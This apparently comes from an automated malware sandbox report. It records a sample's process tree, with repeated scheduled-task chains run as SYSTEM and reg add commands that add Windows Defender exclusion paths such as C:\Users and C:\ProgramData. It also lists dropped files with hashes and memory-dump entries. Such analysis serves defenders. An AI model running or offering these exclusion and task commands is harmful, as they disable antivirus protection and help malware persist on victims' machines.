                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                      3⤵
                                                      • Indicator Removal: Clear Persistence
                                                      PID:616
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                        4⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:3604
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /Run /TN "Task1"
                                                        4⤵
                                                          PID:5448
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /Delete /TN "Task1" /F
                                                          4⤵
                                                            PID:2808
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                          3⤵
                                                          • Indicator Removal: Clear Persistence
                                                          PID:4740
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                            4⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:5964
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Run /TN "Task1"
                                                            4⤵
                                                              PID:1384
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /Delete /TN "Task1" /F
                                                              4⤵
                                                                PID:1164
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                              3⤵
                                                              • Indicator Removal: Clear Persistence
                                                              PID:4516
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                4⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:912
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                SCHTASKS /Run /TN "Task1"
                                                                4⤵
                                                                  PID:4248
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  SCHTASKS /Delete /TN "Task1" /F
                                                                  4⤵
                                                                    PID:5352
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                  3⤵
                                                                  • Indicator Removal: Clear Persistence
                                                                  PID:2672
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                                                    4⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:2248
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    SCHTASKS /Run /TN "Task1"
                                                                    4⤵
                                                                      PID:4032
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      SCHTASKS /Delete /TN "Task1" /F
                                                                      4⤵
                                                                        PID:3336
                                                                • C:\Windows\system32\cmd.exe
                                                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\Jd2xk6" /t REG_DWORD /d 0 /f
                                                                  1⤵
                                                                  • Executes a command shell one-liner
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4260
                                                                  • C:\Windows\System32\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\Jd2xk6" /t REG_DWORD /d 0 /f
                                                                    2⤵
                                                                    • Windows security bypass
                                                                    PID:5716
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd.exe
                                                                  1⤵
                                                                    PID:5412
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4728
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:2192
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:2820
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:2732
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3144
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:692
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:2076
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                      • Windows security bypass
                                                                      PID:5764
                                                                  • C:\Program Files (x86)\ExivtO\klnsiG.exe
                                                                    "C:\Program Files (x86)\ExivtO\klnsiG.exe"
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1248
                                                                  • C:\Program Files (x86)\2xH2MO5Y\J36m190W.exe
                                                                    "C:\Program Files (x86)\2xH2MO5Y\J36m190W.exe"
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5144
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\ExivtO" /t REG_DWORD /d 0 /f
                                                                    1⤵
                                                                    • Executes a command shell one-liner
                                                                    PID:1908
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\ExivtO" /t REG_DWORD /d 0 /f
                                                                      2⤵
                                                                        PID:2304
                                                                    • C:\Windows\system32\cmd.exe
                                                                      "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                      1⤵
                                                                      • Executes a command shell one-liner
                                                                      PID:5084
                                                                      • C:\Windows\System32\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                        2⤵
                                                                          PID:3484
                                                                      • C:\Windows\system32\cmd.exe
                                                                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                        1⤵
                                                                        • Executes a command shell one-liner
                                                                        PID:924
                                                                        • C:\Windows\System32\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                          2⤵
                                                                            PID:3372
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                          1⤵
                                                                          • Executes a command shell one-liner
                                                                          PID:980
                                                                          • C:\Windows\System32\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                            2⤵
                                                                              PID:896
                                                                          • C:\Windows\system32\cmd.exe
                                                                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                            1⤵
                                                                            • Executes a command shell one-liner
                                                                            PID:2876
                                                                            • C:\Windows\System32\reg.exe
                                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                                              2⤵
                                                                                PID:1688

                                                                            Network

                                                                                  MITRE ATT&CK Enterprise v16

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  e59ea67.rbs

                                                                                  • Path C:\Config.Msi\e59ea67.rbs
                                                                                  • Size 7KB
                                                                                  • SHA256 3e794348172726470b5e1f3e5979facee24c10ad32dc73f858f183e575891dad
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  XPSPLOG.dll

                                                                                  • Path C:\Program Files (x86)\2xH2MO5Y\XPSPLOG.dll
                                                                                  • Size 4.6MB
                                                                                  • SHA256 b8cbe22a357e3444ff79c07435f0fcb7f5efc738dfd5333fddaeab6aa3b24e10
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  image.png

                                                                                  • Path C:\Program Files (x86)\2xH2MO5Y\image.png
                                                                                  • Size 5.0MB
                                                                                  • SHA256 e934b738edcf13e23518380daed26a91614536302d9b2f7fbbb2d83970c830ca
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  XPSPLOG.dll

                                                                                  • Path C:\Program Files (x86)\ExivtO\XPSPLOG.dll
                                                                                  • Size 4.6MB
                                                                                  • SHA256 4d67578692e1e0143e4ead585b7de0bab74f385fd6afca1e4b51bca83e68c543
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  image.png

                                                                                  • Path C:\Program Files (x86)\ExivtO\image.png
                                                                                  • Size 5.0MB
                                                                                  • SHA256 4a2d5230eccb8a09fc7cd43bafd5b54d5e24785319194100da493152dd71642b
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  klnsiG.exe

                                                                                  • Path C:\Program Files (x86)\ExivtO\klnsiG.exe
                                                                                  • Size 145KB
                                                                                  • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  thumbs.db

                                                                                  • Path C:\Program Files (x86)\ExivtO\thumbs.db
                                                                                  • Size 358KB
                                                                                  • SHA256 845934e9d1f8492fedf8e81600ef2891fe891ccd4514dcb569cc9de953c33f69
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  StartupProfileData-NonInteractive

                                                                                  • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                  • Size 1KB
                                                                                  • SHA256 6c7022373f3e312737a3ecb9e7c2755e6ab1f288723a3278b34720c6742ecb40
                                                                                  • MD5 SHA1 SHA512 TLSH

                                                                                  __PSScriptPolicyTest_xkruavrd.ozz.ps1

                                                                                  • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xkruavrd.ozz.ps1
                                                                                  • Size 60B
                                                                                  • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                                                  • MD5 SHA1 SHA512 TLSH

                                                                                  UxEnhance64.dll

                                                                                  • Path C:\Users\Public\Jd2xk6\UxEnhance64.dll
                                                                                  • Size 3.1MB
                                                                                  • SHA256 c81a8feabfae06a74cf3dd5a73fadc09f2bcd809260b3a8bab8739679eecc130
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  adoresd.dat

                                                                                  • Path C:\Users\Public\Jd2xk6\adoresd.dat
                                                                                  • Size 4.7MB
                                                                                  • SHA256 175494913a8c300712c219ffdf2c6ed0216c9395106bed49ca1752f625e2b322
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  mTQusj.exe

                                                                                  • Path C:\Users\Public\Jd2xk6\mTQusj.exe
                                                                                  • Size 135KB
                                                                                  • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  msadox.tb

                                                                                  • Path C:\Users\Public\Jd2xk6\msadox.tb
                                                                                  • Size 8KB
                                                                                  • SHA256 4fe47efa98520760bd5e2ea7021f5f9022a0b6fc4ea92537ae5de2fc60b3f34a
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  destopbak.ini

                                                                                  • Path C:\Users\Public\Music\destopbak.ini
                                                                                  • Size 2B
                                                                                  • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                                                  • MD5 SHA1 SHA512

                                                                                  MSIF15C.tmp

                                                                                  • Path C:\Windows\Installer\MSIF15C.tmp
                                                                                  • Size 7.4MB
                                                                                  • SHA256 c5622825cc30c9888fdacd2cfd1660629ed0911c02ac12c6b3e39219f769100f
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  e59ea66.msi

                                                                                  • Path C:\Windows\Installer\e59ea66.msi
                                                                                  • Size 7.5MB
                                                                                  • SHA256 886a7a2e6ae3ac9c1159fc4c5b86421df3567c758b40b31687bedd04a637b87a
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  metadata-2

                                                                                  • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                                                  • Size 26.1MB
                                                                                  • SHA256 55d08147b3ef426eea18d9b8ffcf018aff94440753cda520e52367571edb1155
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  {5359a148-0da8-4d62-bcdc-e0cf6acbb187}_OnDiskSnapshotProp

                                                                                  • Path \??\Volume{c61f3bad-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{5359a148-0da8-4d62-bcdc-e0cf6acbb187}_OnDiskSnapshotProp
                                                                                  • Size 6KB
                                                                                  • SHA256 5929f502aa646465269ffc546dec31ec3a153e908e5b751d02a831dd5b027b7c
                                                                                  • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                  xxxx.ini

                                                                                  • Path \??\c:\xxxx.ini
                                                                                  • Size 2B
                                                                                  • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                                                                  • MD5 SHA1 SHA512

                                                                                  memory/296-268-0x00000000032C0000-0x0000000003AC7000-memory.dmp

                                                                                  memory/296-183-0x0000000000A70000-0x0000000000A71000-memory.dmp

                                                                                  memory/296-225-0x0000000010000000-0x0000000010061000-memory.dmp

                                                                                  memory/296-228-0x00000000032C0000-0x0000000003AC7000-memory.dmp

                                                                                  memory/296-214-0x00000000032C0000-0x0000000003AC7000-memory.dmp

                                                                                  memory/296-202-0x0000000002890000-0x00000000028A4000-memory.dmp

                                                                                  memory/296-195-0x00000000032C0000-0x0000000003AC7000-memory.dmp

                                                                                  memory/296-191-0x00000000032C0000-0x0000000003AC7000-memory.dmp

                                                                                  memory/296-190-0x0000000000EB0000-0x0000000000EB1000-memory.dmp

                                                                                  memory/296-188-0x00000000032C0000-0x0000000003AC7000-memory.dmp

                                                                                  memory/296-184-0x0000000074440000-0x0000000074B8A000-memory.dmp

                                                                                  memory/996-109-0x000001A2C59E0000-0x000001A2C5A02000-memory.dmp

                                                                                  memory/996-112-0x000001A2C5C40000-0x000001A2C5C5E000-memory.dmp

                                                                                  memory/996-113-0x000001A2C5C60000-0x000001A2C5D12000-memory.dmp

                                                                                  memory/996-115-0x000001A2C5A30000-0x000001A2C5A3A000-memory.dmp

                                                                                  memory/1248-242-0x00000000038B0000-0x00000000040B7000-memory.dmp

                                                                                  memory/1248-233-0x0000000001200000-0x0000000001201000-memory.dmp

                                                                                  memory/1248-255-0x00000000038B0000-0x00000000040B7000-memory.dmp

                                                                                  memory/1248-258-0x0000000001200000-0x0000000001201000-memory.dmp

                                                                                  memory/1248-254-0x00000000015B0000-0x00000000015B1000-memory.dmp

                                                                                  memory/1248-234-0x0000000074440000-0x0000000074B8A000-memory.dmp

                                                                                  memory/1532-270-0x0000000005C90000-0x0000000005CB2000-memory.dmp

                                                                                  memory/1532-274-0x0000000005E10000-0x0000000005E76000-memory.dmp

                                                                                  memory/1532-290-0x0000000007500000-0x00000000075A3000-memory.dmp

                                                                                  memory/1532-286-0x000000006E540000-0x000000006E58C000-memory.dmp

                                                                                  memory/1532-285-0x00000000074C0000-0x00000000074F6000-memory.dmp

                                                                                  memory/1532-282-0x00000000064A0000-0x00000000064EC000-memory.dmp

                                                                                  memory/1532-277-0x00000000062F0000-0x000000000630E000-memory.dmp

                                                                                  memory/1532-267-0x0000000005530000-0x0000000005B7A000-memory.dmp

                                                                                  memory/1532-275-0x0000000005EC0000-0x000000000621B000-memory.dmp

                                                                                  memory/1532-291-0x0000000007C90000-0x000000000830C000-memory.dmp

                                                                                  memory/1532-292-0x0000000007650000-0x000000000766A000-memory.dmp

                                                                                  memory/1532-289-0x00000000074A0000-0x00000000074C0000-memory.dmp

                                                                                  memory/1532-273-0x0000000005D30000-0x0000000005D96000-memory.dmp

                                                                                  memory/1532-266-0x0000000002DC0000-0x0000000002DF6000-memory.dmp

                                                                                  memory/1532-293-0x00000000076C0000-0x00000000076CA000-memory.dmp

                                                                                  memory/1532-294-0x00000000078C0000-0x0000000007956000-memory.dmp

                                                                                  memory/1532-295-0x0000000007840000-0x0000000007851000-memory.dmp

                                                                                  memory/2732-16-0x00007FF90B1A0000-0x00007FF90B1B2000-memory.dmp

                                                                                  memory/2732-42-0x00007FF90B1A0000-0x00007FF90B1B2000-memory.dmp

                                                                                  memory/2732-13-0x00007FF901950000-0x00007FF901F7C000-memory.dmp

                                                                                  memory/2732-12-0x00007FF925630000-0x00007FF925632000-memory.dmp

                                                                                  memory/5144-278-0x0000000001340000-0x0000000001341000-memory.dmp

                                                                                  memory/5144-264-0x00000000036A0000-0x0000000003EA7000-memory.dmp

                                                                                  memory/5144-260-0x0000000072900000-0x000000007304A000-memory.dmp

                                                                                  memory/5144-259-0x0000000001220000-0x0000000001221000-memory.dmp

                                                                                  memory/5144-283-0x0000000001220000-0x0000000001221000-memory.dmp

                                                                                  memory/5144-279-0x00000000036A0000-0x0000000003EA7000-memory.dmp

                                                                                  memory/5896-72-0x00000214B33C0000-0x00000214B3C51000-memory.dmp

                                                                                  memory/5896-86-0x00000214B3CF0000-0x00000214B3D7A000-memory.dmp

                                                                                  memory/5896-57-0x00007FF901A60000-0x00007FF901F7E000-memory.dmp

                                                                                  memory/5896-62-0x00000214B33C0000-0x00000214B3C51000-memory.dmp

                                                                                  memory/5896-70-0x00000214B33C0000-0x00000214B3C51000-memory.dmp

                                                                                  memory/5896-64-0x00007FF925640000-0x00007FF925642000-memory.dmp

                                                                                  memory/5896-84-0x00000214B3CF0000-0x00000214B3D7A000-memory.dmp

                                                                                  memory/5896-56-0x00007FF925630000-0x00007FF925632000-memory.dmp

                                                                                  memory/5896-87-0x00000214B3CF0000-0x00000214B3D7A000-memory.dmp

                                                                                  memory/5896-76-0x00000214B33C0000-0x00000214B3C51000-memory.dmp

                                                                                  memory/5896-65-0x00000214B33C0000-0x00000214B3C51000-memory.dmp

                                                                                  memory/5896-83-0x00000214B3CF0000-0x00000214B3D7A000-memory.dmp

                                                                                  memory/5896-82-0x00000214B2920000-0x00000214B296E000-memory.dmp

                                                                                  memory/5896-89-0x00000214B33C0000-0x00000214B3C51000-memory.dmp

                                                                                  memory/5896-69-0x00000214B33C0000-0x00000214B3C51000-memory.dmp

                                                                                  memory/5896-91-0x00000214B33C0000-0x00000214B3C51000-memory.dmp

                                                                                  memory/5896-71-0x00000214B33C0000-0x00000214B3C51000-memory.dmp